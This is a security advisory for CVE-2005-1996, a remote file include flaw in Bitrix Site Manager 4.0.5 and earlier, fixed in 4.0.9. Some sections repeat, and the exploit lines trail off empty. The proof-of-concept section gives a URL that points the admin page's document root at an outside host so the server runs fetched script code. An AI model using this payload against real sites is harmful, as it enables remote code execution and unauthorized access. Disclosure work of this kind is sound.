Bitrix Site Manager Remote File Include Vulnerability
BID:13965
Info
Bitrix Site Manager Remote File Include Vulnerability
| Bugtraq ID: | 13965 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-1996 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 15 2005 12:00AM |
| Updated: | Jul 23 2010 09:56PM |
| Credit: | Discovery is credited to D_BuG <[email protected]>. |
| Vulnerable: |
Bitrix Site Manager Bitrix Site Manager 4.0.5 |
| Not Vulnerable: |
Bitrix Site Manager Bitrix Site Manager 4.0.9 |
Discussion
Bitrix Site Manager Remote File Include Vulnerability
Bitrix Site Manager is prone to a remote file include vulnerability.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
Bitrix Site Manager 4.0.5 and prior versions are considered to be vulnerable at the moment.
Bitrix Site Manager is prone to a remote file include vulnerability.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
Bitrix Site Manager 4.0.5 and prior versions are considered to be vulnerable at the moment.
Exploit / POC
Bitrix Site Manager Remote File Include Vulnerability
A proof of concept example is available:
http://www.example.com/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.example.com/
An exploit is available:
A proof of concept example is available:
http://www.example.com/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.example.com/
An exploit is available:
Solution / Fix
Bitrix Site Manager Remote File Include Vulnerability
Solution:
The vendor has released Bitrix Site Manager 4.0.9 to address this issue. Please contact the vendor to obtain fixes.
Solution:
The vendor has released Bitrix Site Manager 4.0.9 to address this issue. Please contact the vendor to obtain fixes.
References
Bitrix Site Manager Remote File Include Vulnerability
References:
References:
- Bitrix Site Manager Home Page (Bitrix)
- Vulnerability: Bitrix Php inclusion (D_BuG
)